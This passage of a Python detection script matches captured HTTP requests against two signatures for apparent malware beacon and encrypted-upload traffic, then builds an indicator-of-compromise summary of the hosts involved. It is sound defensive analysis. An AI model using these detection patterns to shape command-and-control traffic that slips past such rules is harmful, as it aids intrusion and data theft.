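        headers[key.strip().lower()] = value.strip()
    return method, path, headers


def classify_request(raw: str, body: bytes = b"") -> List[str]:
    """Return the signature names the request matches (empty list if none)."""
    method, path, h = parse_request(raw)
    host = h.get("host", "")
    port = host.rsplit(":", 1)[1] if ":" in host else "80"
    hits = []
    if (method == "POST" and port == "8080" and BEACON_PATH_RE.match(path)
            and h.get("user-agent") == BEACON_UA and h.get("cache-control") == "no-cache"
            and "content-type" not in h):          # binary body with no Content-Type
        hits.append("beacon-post-8080")
    if (method == "POST" and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary" and body.startswith(b"CRYPTED0")):
        hits.append("crypted-octet-stream-post")
    return hits


def summarize(lines: List[str], requests: List[Tuple[str, bytes]]) -> dict:
    """IoC-style summary: dead peers plus the hosts each POST signature was sent to."""
    beacon, crypted = set(), set()
    for raw, body in requests:
        host = parse_request(raw)[2].get("host", "?")
        for tag in classify_request(raw, body):
            (beacon if tag == "beacon-post-8080" else crypted).add(host)
    return {"refused_peers": refused_peers(lines),
            "beacon_hosts": sorted(beacon), "crypted_post_hosts": sorted(crypted)}


if __name__ == "__main__":
    print(summarize(PACKET_LINES, [(BEACON_REQUEST, b""), (CRYPTED_REQUEST, CRYPTED_BODY),
                                   (BENIGN_REQUEST, b"")]))
```

The two rules are deliberately narrow (they key on the exact header combination seen here rather than on the path string alone, which changes per build), and refused_peers() is order-independent because the paste itself shows a RST/ACK listed before its SYN for 173.192.229.36.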